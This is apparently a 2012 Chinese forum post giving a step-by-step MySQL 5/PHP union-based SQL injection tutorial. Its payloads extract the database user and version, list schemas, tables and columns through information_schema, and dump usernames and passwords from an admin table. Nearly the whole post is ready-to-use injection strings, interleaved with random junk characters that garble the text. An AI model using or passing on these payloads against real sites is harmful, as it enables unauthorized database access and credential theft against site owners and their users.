' q Z7 j i. q; I4 a; g教程内容:Mysql 5+php 注入, D( X' @+ P9 H1 o
) \; @' I7 A- ~$ S) v9 O
& l3 i6 y( F/ ]) g8 Q2 j- k$ T
5 z# `2 `& P% `7 ?. y/ d8 H一.查看MYSQL基本信息(库名,版本,用户)
: t# P, D9 @2 Q& \$ I9 k* Q
; C7 ^- ?+ N( W4 A. P# K- z8 h+ n$ `and 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*
. Q, N' @* c4 i7 M, v |& A
2 R$ t9 Z1 d8 Z6 Q8 r+ `二.查数据库8 m% M& K% Y% ^$ ]: U6 J1 z
3 Z8 ]( e6 q! B( ~, n
and 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*' E* E& f1 u( \+ T! x L
limit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。
, y5 ?; l3 Y9 ?( z4 n w& e0 q, k5 r: r, y6 [& \) m( Z$ T" @
三.暴表
+ q& q% L+ C( e4 u& U- L: Z" i! a. ^+ b9 x
and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*; Y" b( e% A0 f; u' [8 t' D# G
Q! _' r2 T$ V% y! ]# K8 z( R! {
limit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。/ C) u, }. u: F: l' A2 ]4 I( i5 e! `' R2 B
) `" W8 f3 y' B% k, h1 f四.暴字段
8 t" |/ O: F4 k" N9 z3 Q( _1 J. a
and 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*4 D9 C5 | G/ i( ]
: P, N4 |2 U7 h; i6 w
limit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。
* Q+ a, G1 ~, Q' u9 N r/ u5 i2 }2 K1 Q2 x% _ z" r
五.暴数据# U% ~& `: W2 J( t
' x! p. y$ S9 L2 ?, ~8 N" {and 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*" O5 R" X! S% T; S" I
% [* Q B! A8 y+ F7 {1 s+ T. O2 Z
1 ~; T( T. J& B* D* ~& G这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。% Z" K+ X; u' D& x2 z
|
发表于 2012-9-13 16:27:53
收藏
支持
反对